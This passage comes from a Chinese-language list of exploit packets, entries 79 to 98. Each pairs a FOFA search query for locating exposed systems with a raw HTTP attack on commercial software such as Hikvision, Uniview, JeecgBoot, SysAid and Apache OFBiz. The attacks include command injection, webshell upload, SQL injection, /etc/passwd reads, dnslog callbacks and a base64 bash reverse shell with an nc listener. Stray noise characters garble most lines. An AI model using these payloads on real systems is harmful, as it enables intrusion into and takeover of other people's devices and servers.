! c: L5 D* J# G Q5 ~- i% i) YGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
: a1 o- S( b+ c2 s; K; x# WHost: x.x.x.x3 L+ f+ O: b4 u8 A4 S* _
H L7 c2 X1 j" u/ Z4 `% L `, |7 [. |+ Y- n
79. BYTEVALUE 百为流控路由器远程命令执行
' {6 B% F7 S. j/ ^5 R* ` \FOFA:BYTEVALUE 智能流控路由器7 @1 M: H" E$ R5 b6 r" S
GET /goform/webRead/open/?path=|id HTTP/1.1
0 q* o x" P% Z) u: D7 n/ _Host:IP
9 i& v' T# g& q5 G! jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.09 I; F w U0 j' j; G4 Z; G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" R* p% X G7 f6 B: ~: Z" I3 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 ^; d4 u6 \' k
Accept-Encoding: gzip, deflate4 C3 \- @+ O5 n2 }
Connection: close7 q, |4 G3 N0 D+ c) ]
Upgrade-Insecure-Requests: 1
* w9 v& |# f j8 v+ c3 j/ l1 G
1 _4 R1 g! z$ ~) W+ O! a3 y$ H, U7 k1 `% j }
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
4 |1 A4 q" s% Z- ~" d5 [FOFA:app="速达软件-公司产品"! e6 P6 g, j! f; e9 |$ O
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.10 q2 Y, Z8 [+ _; l
Host: x.x.x.x8 r* I, Z* ]. O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 E- P1 a$ Q5 M r
Content-Length: 27# i2 a; f$ W$ R0 D% r- m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 g: A, f/ I8 E* N* i6 sAccept-Encoding: gzip, deflate; `3 ?5 I! B8 W5 V2 ]1 H0 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 H4 h& m. \5 D, LConnection: close# v C2 y3 h: J8 [" a
Content-Type: application/octet-stream
0 s9 o& |; Z& Q: Z' S9 uUpgrade-Insecure-Requests: 1
2 M0 ^7 S8 M' { L
9 h6 q. c/ A: m* x! l<% out.print("oessqeonylzaf");%>
- z$ k& \+ K6 Q8 {; _- @3 f" E5 q5 O* }
8 b9 j" y; w0 R+ e3 L8 T6 \
GET /xykqmfxpoas.jsp HTTP/1.1, k3 b: z$ Q- |4 G
Host: x.x.x.x+ U# V9 h/ v+ F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* @& o3 K1 L3 S J& P8 \: s# ^% yConnection: close* w1 G; v$ B- r: {7 ^" y8 K
Accept-Encoding: gzip7 [( X8 g3 w# m
4 Q- G9 j0 |2 t: t, }# h
, G \' t" V- q4 T
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
7 A; k Z+ H( X8 mFOFA:app="uniview-视频监控". V6 c& G# G& U) g5 f1 ]) U2 E! q
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
( z- h& f& i; L6 p& M% U1 XHost: x.x.x.x
$ x0 P8 w) z7 {% TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, {" z; E/ S6 n. H" O. r/ w. S
Connection: close( C, K1 Q- @1 k% X
Accept-Encoding: gzip% M$ M. B8 l1 G. u+ W
. J$ Y( X& T8 }8 u4 J
; X, \& M. f* a82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行& N2 |3 M" f8 p3 g- w4 V: ]
FOFA:app="思福迪-LOGBASE"3 O9 A3 ?. p' b2 w, j J- ?7 \
POST /bhost/test_qrcode_b HTTP/1.1
4 f5 e0 ^1 F( a' T. bHost: BaseURL! O. X8 ~* }8 o/ ]- ~ x. r6 L' P: w& } Q
User-Agent: Go-http-client/1.1$ J+ G% i3 {2 R. f
Content-Length: 23
: Z5 q1 K9 G& X; n$ }+ ?3 O) I6 dAccept-Encoding: gzip* G- p. C$ f+ H2 h& z% X
Connection: close( ]/ l/ r+ K' w9 l+ e3 B. Q+ Q
Content-Type: application/x-www-form-urlencoded
. h+ d! D8 O: O; S: _/ dReferer: BaseURL
, b! I! A9 H2 T" r Z M3 [; b
! a. ?, ^9 \! k: u# u; _z1=1&z2="|id;"&z3=bhost
) \+ d0 h3 c8 z# j5 X! X/ X
. J9 ? X, M/ s+ s
" b; |: ]- `9 z8 s6 S, T/ @5 ^83. JeecgBoot testConnection 远程命令执行& m5 k( v- `4 K$ H
FOFA:title=="JeecgBoot 企业级低代码平台"
$ W. E1 L7 R- W$ k5 D- O L, Y8 L; j; ?; [2 W- v
( B3 {+ m K( F- e; e9 e' c; ]
POST /jmreport/testConnection HTTP/1.1
" C1 X5 x: n8 d. p# c g: V4 z7 yHost: x.x.x.x; F* k! ?' A6 p6 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 R5 B F% S; [Connection: close! Z% ]# w- n+ U( n
Content-Length: 8881) C' A5 ?9 {: U& S8 V% r9 D( r
Accept-Encoding: gzip6 d' G1 J2 P% B2 H6 z( y' i( n2 Z5 o
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"8 t* e0 y9 i2 H! H6 l
Content-Type: application/json) U* M3 D' o+ o* w
5 o" q" S6 Y: g- ]+ Q
PAYLOAD' j; _' z$ s! _6 j: h8 P# E
' X# m' T3 r- \7 X84. Jeecg-Boot JimuReport queryFieldBySql 模板注入% q2 m" s* K6 }/ i
FOFA:title=="JeecgBoot 企业级低代码平台"" m" n* \0 j I! ?( f
8 S( x f. f, ~( l6 o( u
7 s- i" q% {" c& f9 i( b9 W& S$ i. m6 s' B( F: v( N1 z
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
$ x( E8 @* T1 e/ T# s6 C }4 Y- dHost: 192.168.40.130:8080, Z7 r( i8 T& d! v% ~* d
User-Agent: curl/7.88.1# w! e h5 Z. ^2 D$ Y9 H
Content-Length: 1564 N! _4 v9 e& _9 ]4 ?
Accept: */*' N' _" n. e7 U+ I
Connection: close1 ]6 A2 K+ o0 k1 k# y3 I: T9 @7 r
Content-Type: application/json# u/ T* H t. [+ ?3 _3 }5 k
Accept-Encoding: gzip9 o& G! X. i' A `
1 J8 W# V" S5 j' F$ m, F8 z{
; h5 E6 Y( r' F+ D% p" D( o! }; ? "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
& t+ Z# l* i6 L; m# h$ m( P, ~ "type": "0"+ d0 }! a( E2 f% N0 k
}
; W* i! k2 c4 _1 q- M
6 i& Q) m/ G6 x! `- f6 E- w1 Q- ?2 ]8 u# h b
85. SysAid On-premise< 23.3.36远程代码执行& N4 `8 m4 ~' J2 F9 i! b
CVE-2023-47246, B8 L# F4 `' u/ g7 F/ h+ b
FOFA:body="sysaid-logo-dark-green.png" , p; d2 C/ Y- b+ I7 Q3 z/ x# v4 u. Q
EXP数据包如下,注入哥斯拉马
9 W0 {* Y0 p' f% o2 {+ E( gPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1* k8 y7 d7 |4 t, n$ ~
Host: x.x.x.x4 g1 {# R/ |6 X. K) ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Z0 G; _) n1 j, [5 e
Content-Type: application/octet-stream
' T; h% L2 ]% ?) W: `! Y4 Q& DAccept-Encoding: gzip
) h7 [# h+ L3 j$ W; O) I1 y! ]# n. Q4 S {9 A4 n( D
PAYLOAD& T! G( k+ B3 B5 P& a
1 [3 @4 y2 J9 n4 m% V- m0 C. s+ p- ?回显URL:http://x.x.x.x/userfiles/index.jsp# B3 M( d4 s' G' ?2 T, Y
s8 p W9 o( e, N8 ]/ k. j86. 日本tosei自助洗衣机RCE
; u7 W. k5 g' s7 @' V+ pFOFA:body="tosei_login_check.php"+ X0 A- A! S; _- F" P/ R
POST /cgi-bin/network_test.php HTTP/1.1
, R2 w5 Q2 b$ tHost: x.x.x.x
; z0 U/ o5 I# u. W+ r ?, ~* G- ]User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
& U! s/ I s7 Y& rConnection: close
. p5 }2 y# w" hContent-Length: 447 D0 o1 M' f) N! Z& Y8 Y' q
Accept: */*+ ~5 H& u0 e% ]) n
Accept-Encoding: gzip
' S! j. A# Z6 S6 I5 `4 z" P( _1 \Accept-Language: en
! @% R, O* \9 V& ~( B: @Content-Type: application/x-www-form-urlencoded
, u0 X; z: d/ Q0 n' D
' _! `5 {1 q' _host=%0acat${IFS}/etc/passwd%0a&command=ping- z# h% ^" V8 M) D j3 P
( K* ^( ` }! Z/ Q; |) l; v" k+ @+ a1 s( }* H
87. 安恒明御安全网关aaa_local_web_preview文件上传
7 b5 }+ {/ O$ N: u" ^8 Z# C- G1 NFOFA:title="明御安全网关"! f2 s4 _- f! h- y G c
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
: y: M/ q. i2 N5 R) S* c7 B9 XHost: X.X.X.X
: S$ a2 |+ `! e2 c fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 _1 D8 w2 b/ o1 {Connection: close
8 L2 b- w j2 x* z) J! hContent-Length: 198( I, {2 g+ O% [( I: b+ @
Accept-Encoding: gzip
3 h+ W9 y! U& `& j# s& {% LContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
5 X% k, x1 ]9 H! O/ h3 s- R1 P# U1 F: [$ f' }6 g- f' N9 z
--qqobiandqgawlxodfiisporjwravxtvd# `4 p9 ]0 O& t# q- f
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
+ K3 Z: T9 z+ M9 AContent-Type: text/plain
: L* s* _3 j7 t6 A" q8 a
# E. ?: Z! F& ?1 m2ZqGNnsjzzU2GBBPyd8AIA7QlDq6 G6 p, r! r+ W+ Q$ p# Z
--qqobiandqgawlxodfiisporjwravxtvd--" w, ~8 g7 e+ s8 l5 y q
# o* b# n5 N- O; O u1 Z1 X) |' z/ H) w
/jfhatuwe.php
2 \; i3 x& B: }6 r) {3 P. ^, u: p# u3 {" V4 Z# ]& x; R
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
6 n' p) J4 L& ~/ Q* e7 A% VFOFA:title="明御安全网关"" m5 {, {( f5 d+ C+ @6 B
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
* Q# J' @! p6 X8 S( ?Host: x.x.x.xx.x.x.x
8 @" d5 H2 t1 j+ c* XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ _( q3 z: ^8 u) d+ b9 M1 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 T* t9 @3 |3 v* I2 z% S1 eAccept-Encoding: gzip, deflate
/ `3 N/ b5 ]1 H6 n' v F! f, xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! s" l b8 y) N# {2 n* |' NConnection: close( l. `2 }, i7 _# t6 A- R
1 X; m: F* z: l# o! h
+ f: I9 P1 v+ K @5 J6 K1 `/astdfkhl.php
7 I& i, ~, G6 a) c7 h: j+ V0 o$ q; b; r
89. 致远互联FE协作办公平台editflow_manager存在sql注入) f3 n; P4 X" b$ U5 b0 E6 _; O
FOFA:title="FE协作办公平台" || body="li_plugins_download"
/ b! Y; [: f/ }- I7 pPOST /sysform/003/editflow_manager.js%70 HTTP/1.1# b1 b" I$ O3 E* \8 l- \
Host: x.x.x.x
( ]! J! g# p6 Z- P3 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* g3 s' L6 P4 j. o) f
Connection: close3 U( [2 O' S1 i; E4 z; A x
Content-Length: 41
$ a& M& u( R1 TContent-Type: application/x-www-form-urlencoded3 C2 b# k p: G" u. p) p0 A/ X! \
Accept-Encoding: gzip* D: q w7 k" @3 {* I
7 ?2 E$ T1 V; J! J9 O
option=2&GUID=-1'+union+select+111*222--+
% c( S& K1 k; ?, V9 C
$ T- L- Y% w/ \9 A" e
3 J3 F; M0 x( j4 N' W2 ?- v90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行7 j! V# s5 {: T7 O7 r {
FOFA:icon_hash="-1830859634"5 F# s) ^ g3 [$ ?" S) X) X
POST /php/ping.php HTTP/1.16 H+ E8 Z( [: H# }% e" ~0 }
Host: x.x.x.x- w0 R3 w# j% \2 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 m) A8 f" ^% [! vContent-Length: 51" \+ V c4 Q! J" ^9 f0 B
Accept: application/json, text/javascript, */*; q=0.01
y8 V" p1 }: O0 T' F% M1 B; TAccept-Encoding: gzip, deflate
8 g3 B9 f; j; s+ C# t( r1 H5 j/ lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 M7 }/ x' y) m+ d3 ]8 E4 e" P/ UConnection: close
8 A7 }1 g" R/ v8 aContent-Type: application/x-www-form-urlencoded
1 E7 O. R# ]0 tX-Requested-With: XMLHttpRequest
8 N' d% E. B: M7 E
$ M9 _& R, V) ^/ w( V% U& s* djsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
f/ ^# X0 s6 ]3 K9 ` F2 u1 J; d% W; g' D$ i
( l8 w$ Q9 ^6 X ?9 L4 e
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
1 {5 c8 I) u( n8 R. P" p) w: yFOFA:title="综合安防管理平台"
+ S+ x4 L6 u. r! b4 L8 c: g- _6 \- SGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1) b, p5 u* Q6 o$ M& w. N# g, L8 q
Host: your-ip
Z( R, o! [% b4 I! T4 C8 M; d( s$ \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36; \' a" _# l& ]' ~
Accept-Encoding: gzip, deflate( M6 S# S7 C; ?5 b
Accept: */*
, q( F# o- j" [ ~0 F4 b- BConnection: keep-alive# F9 x4 j$ z4 x( I: M# U
( c% T- @1 S5 c6 z% J
* t3 e$ Z+ v* q. R4 m2 F+ D
7 L* p5 u7 D3 d x. Y- u2 t2 I! R92. 海康威视运行管理中心session命令执行0 C5 u0 r; c0 ]& B
Fastjson命令执行' g- h. _0 w+ |9 L7 |
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
* g% _5 b; s4 J- V1 f/ F# zPOST /center/api/session HTTP/1.1% B6 Q3 ]& `2 J0 | q8 c! @$ n
Host:
6 z$ q3 S& b7 T/ rAccept: application/json, text/plain, */*( A, N2 h9 t& r- \8 _& x
Accept-Encoding: gzip, deflate" I+ o: _' N9 q) L: f8 P4 [
X-Requested-With: XMLHttpRequest" i6 }8 a3 F; v$ d! \4 k9 G4 V! B, R5 B
Content-Type: application/json;charset=UTF-8% D0 x4 m& ~0 B1 D4 Y, J+ `1 J
X-Language-Type: zh_CN2 n8 n8 I! p3 o; ]6 q
Testcmd: echo test
- t3 {& P* D( F/ S( [( ]$ g) H) y8 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36: a& H; V+ [) ~8 l% n6 b
Accept-Language: zh-CN,zh;q=0.99 O$ {0 `. W; H/ L7 i
Content-Length: 5778
, }' h9 h6 f/ t* y' N) p9 j+ x& A3 d5 [( A3 b% T$ o# _
PAYLOAD) P5 A- b, K1 |$ r% E! M
1 U0 Q( @3 `: V' `
/ U; j: p! q+ `/ S, ]93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传" [ [8 r7 U1 W. V* T$ o
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
% P, }" `2 P- U1 ~1 Z# zPOST /?g=app_av_import_save HTTP/1.1
' u+ W2 ]& |* s' R+ ~% g0 gHost: x.x.x.x
, Z! |- l* V H; J5 _Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
1 o8 Y. q7 s; S% j7 L vUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 [; w1 j5 M7 O3 F( N
1 ^4 o7 j x: y, A1 u+ k------WebKitFormBoundarykcbkgdfx7 F- Y+ j$ |- K T# l/ X
Content-Disposition: form-data; name="MAX_FILE_SIZE"2 S0 `' U3 ~* Y2 U8 s8 g) g
6 H, V R2 G3 m' Q
10000000" v' l* A1 ?4 l$ q. h
------WebKitFormBoundarykcbkgdfx+ u9 N+ m$ a* o; G8 p9 }' }* F
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
; h$ u0 }+ E0 i% x* r- hContent-Type: text/plain
9 @: b/ O% l7 Q/ t+ ]) A( t
: g# e+ q0 u5 X+ U; u( ~- }wagletqrkwrddkthtulxsqrphulnknxa
0 r" e! W) _+ Q \! b+ u8 r9 y T------WebKitFormBoundarykcbkgdfx
5 @2 g. E, @+ [2 V9 _8 cContent-Disposition: form-data; name="submit_post"
L" h" H: e1 ?. S8 O4 S' o y% q% q1 @# g
obj_app_upfile
6 v0 r N5 c; A: Q' ^: Z% q8 G7 ^------WebKitFormBoundarykcbkgdfx
2 @4 H6 d8 ^ r+ w0 W, N) u2 hContent-Disposition: form-data; name="__hash__"& c3 r v/ t C
! G" y* ~* |3 a# J- [; S ?) S% O0b9d6b1ab7479ab69d9f71b05e0e94454 E: M$ W+ E% X8 h9 V
------WebKitFormBoundarykcbkgdfx--" e) `7 A2 u( u" {8 K
/ `& t% a ?9 h+ u( F+ y
7 r, k& p* y3 W: L& O8 @GET /attachements/xlskxknxa.txt HTTP/1.1
h& ?* T' S+ T t5 ZHost: xx.xx.xx.xx3 M0 P4 o' d& \* w( p9 k1 S
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* S8 m( I' B& B
1 h+ G$ H j# p, F
! |/ Z& K) t/ {$ ?0 e, w
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传- Y# E2 A$ p" d$ b8 S
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="& U) s, O% c7 C
POST /?g=obj_area_import_save HTTP/1.1
1 h8 T& q! |7 X! LHost: x.x.x.x8 J/ Y; S5 N1 D j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
! i& S# K: m+ y, p0 x, E8 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 p+ N' ?- y4 p5 i" v
) N# L# s# n% k% a) b% N------WebKitFormBoundarybqvzqvmt
9 S; Z5 I& R: v0 d" h+ q, GContent-Disposition: form-data; name="MAX_FILE_SIZE"
( v: ?7 n6 ]9 [1 m% L, [3 W- `2 S+ K! N+ \7 p% | x& o. t6 f' R( i
100000000 P, ?" G* s6 M! K, u5 @
------WebKitFormBoundarybqvzqvmt9 J/ Z p# B) M9 o1 V; x' D
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
% Z9 ? f. q z! h& w; P) xContent-Type: text/plain, ?& p+ ~" {, D; o% s( C4 @& E/ c4 u
8 M0 J6 G( e5 y. _$ Jpxplitttsrjnyoafavcajwkvhxindhmu; r7 U; ?& {7 {5 L
------WebKitFormBoundarybqvzqvmt
* W$ w4 o! w3 `& s/ I* g8 QContent-Disposition: form-data; name="submit_post"* P$ b8 V. ^% ^9 |* T( \3 |
; J" W6 A" V" P: i& c9 e. d/ c, Q4 Vobj_app_upfile
/ Z* D, q' G; z( x4 W% ^! u------WebKitFormBoundarybqvzqvmt/ \) F% {% v% t/ X* A7 v) m; y
Content-Disposition: form-data; name="__hash__"9 L* E" j3 X' @) l% }8 J( H8 ?( U
: k: }/ C0 M& P+ p( @/ O9 X9 m0b9d6b1ab7479ab69d9f71b05e0e9445' s/ f0 `$ f7 {; h' z8 U% C0 s
------WebKitFormBoundarybqvzqvmt--8 Q* }. F# p; s% e: N2 J* F$ E
) @3 u9 F ]. f% J
' v7 X9 ]6 ]' A& f+ j
B9 D0 C* u D2 {; VGET /attachements/xlskxknxa.txt HTTP/1.1( J ?7 b- Y; i
Host: xx.xx.xx.xx1 P- {4 S7 b! g ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& D1 g* X% r6 s9 d6 c. b* p' L% a7 r o9 M" o
& [ z$ q. ~; ^/ A- G
1 l! _2 u& ^4 v( R2 A3 Z) Q' m) a95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
+ H3 Y6 N" y" n* [CVE-2023-490703 }6 C, i2 z( E& }$ o+ l9 i! }* d
FOFA:app="Apache_OFBiz"
' X3 u( h. G7 ?- v+ W! |! z. Q& iPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
# q9 V/ n2 n Y! W5 [/ |Host: x.x.x.x
* a3 F! j T/ L( nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" E# A; t7 B: Q% b
Connection: close
6 C' E( j2 l5 @8 I: W0 N( kContent-Length: 889) ]4 H V7 r) y U/ h
Content-Type: application/xml. S/ G0 Y1 X) E' ^; [. W1 d& E
Accept-Encoding: gzip
5 j* E+ ~, p1 O4 Q1 R3 k$ L. g. M& ~4 P6 u. n; V
<?xml version="1.0"?>
2 O4 S7 I3 s: _* V* D G% j* f) h<methodCall>/ T9 H6 s. \* n7 J7 D9 `
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>; R, ?- y" Y% ^' c. b% W' W
<params>
9 e1 a$ w9 {+ E" {# y, M* S' ^ <param>; R0 e$ i' l8 E6 ~
<value>7 M% r. f: Q) _5 N# G) \; i
<struct>4 ~6 M6 N7 r/ P
<member>
2 Y) \ t9 M- x0 m <name>test</name>
1 R$ ^2 ]0 D* a O% W, R <value>- k3 @+ J' u) B) u4 I h( Q1 K
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>9 s( I0 k( w8 r; x. P$ W9 {5 u) I
</value>
3 J# A) s* ^9 q0 S4 B/ `# L# v" T </member>
# z5 ?, X: @" I* J+ ~3 f; {2 b# X </struct>
A$ X' ]/ }7 L" i; O3 F2 ] </value>
3 ^& @5 v. j. O/ |2 W: ?' q m </param>8 f3 L" u' V& P- b( r( o3 x
</params>
$ f4 D e2 `) W+ A) y1 X</methodCall>& n( S( a7 \; P* b
0 ?: b0 H6 |$ R9 W( C* n7 ]* }0 |7 P+ k# U
用ysoserial生成payload \ m9 Z; X/ j- R' ~# W5 Z
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
2 l" \( _+ N3 l3 P {
; y. l1 [) G' b
& c/ C. O$ S/ v% c将生成的payload替换到上面的POC
# |. n6 S: F! _. bPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1% ^# N, ~, d; ^1 u% `, S+ v
Host: 192.168.40.130:8443+ U# Z6 g6 V/ v; Q! I8 _4 V# m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
3 Q5 e1 R: q5 rConnection: close
6 p/ A B- V/ N3 T- T0 eContent-Length: 889
: {9 q; D/ q5 yContent-Type: application/xml
" ^) C7 u/ h, l6 e1 ~Accept-Encoding: gzip
8 K* [) P) ?. D1 f5 C. L$ o$ ]
: e- N5 y+ J) z# | n. ~3 e; bPAYLOAD
P! x, `8 M& a! {& o: ^* j: d/ k# X& b3 I& |% }3 f; \3 f
96. Apache OFBiz 18.12.11 groovy 远程代码执行
/ t2 G& k! I0 e: R3 m0 ~" N* HFOFA:app="Apache_OFBiz"' P {% ]* y" z+ x. n
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.15 B! l+ Q4 M# [! f7 T
Host: localhost:8443
0 g5 r, D: F9 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( V" b* x( L: M* K3 w6 y' S
Accept: */*
6 V# H; _& ^+ E; ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. R& E* ?! K' L3 a( k0 VContent-Type: application/x-www-form-urlencoded# N r1 y" r' Y! E& R5 [& n
Content-Length: 55
7 E& h% Z5 B# w6 n& A6 ^1 C. A3 X! {$ i! z. L
groovyProgram=throw+new+Exception('id'.execute().text);
; \2 u0 n0 B4 e4 {$ E: J3 J* o" J* @: M. x
! Q1 X( J; Q7 @) Y- v' U反弹shell( k8 s/ a, ~! w* p
在kali上启动一个监听5 G+ w- G. q+ F
nc -lvp 77774 w4 t# Z! m9 e: L3 J$ P# q: S+ {9 z9 G
& D8 e0 P/ q: T- ?2 BPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.14 T4 G2 _5 _3 ?$ V/ n
Host: 192.168.40.130:8443' A) H; |: Y9 K: N% E. x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ y- y2 Q: g2 x7 b; T2 f; F7 UAccept: */*; v# w( j1 l/ s+ @( m$ S' o! L9 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 u8 ?2 z) B, j/ T3 v$ s
Content-Type: application/x-www-form-urlencoded
& k9 B4 T' }6 y' t5 V: WContent-Length: 71
; V' E5 M B2 j6 q* a2 x3 `1 L& j* [2 V( C
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();7 K8 v' P9 V5 X. k) ]& Q7 ~
3 y# L" Y. Q' K2 \+ a8 g! X* y( L97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行& I6 a2 O% |+ n" A
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"* a3 \6 |) U# ~( [ E' x
GET /passport/login/ HTTP/1.1
% V! \+ B1 L6 iHost: 192.168.40.130:8085
* ]5 X* h" X' XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 ?9 L4 i& F8 L0 E2 N1 S% m7 IAccept-Encoding: gzip
: }/ G/ R6 @6 D. a$ G; LConnection: close0 d1 q: f9 i# c$ N5 Z B; @
Cookie: rememberMe=PAYLOAD
7 l4 _3 }6 y) S3 r; [' ?$ o7 N- SX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk" ?" w! ]7 g! J
- J$ ^# r8 n9 v# @' z# y! X0 u3 O" m
' y+ C& }9 Z3 N7 U1 R2 l. a1 Y98. SpiderFlow爬虫平台远程命令执行 j; M. L9 W: P8 J U
CVE-2024-0195% [( o6 h. V6 ]$ s# M/ u
FOFA:app="SpiderFlow"3 k' W6 \: [& z4 C3 R
POST /function/save HTTP/1.1% V/ e# r( W! L
Host: 192.168.40.130:8088* t7 ~7 }5 U: s4 O( j* i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ L, i! a2 I- _! F, ^: C' w/ u7 DConnection: close
2 i$ g2 P& p7 ~7 HContent-Length: 121
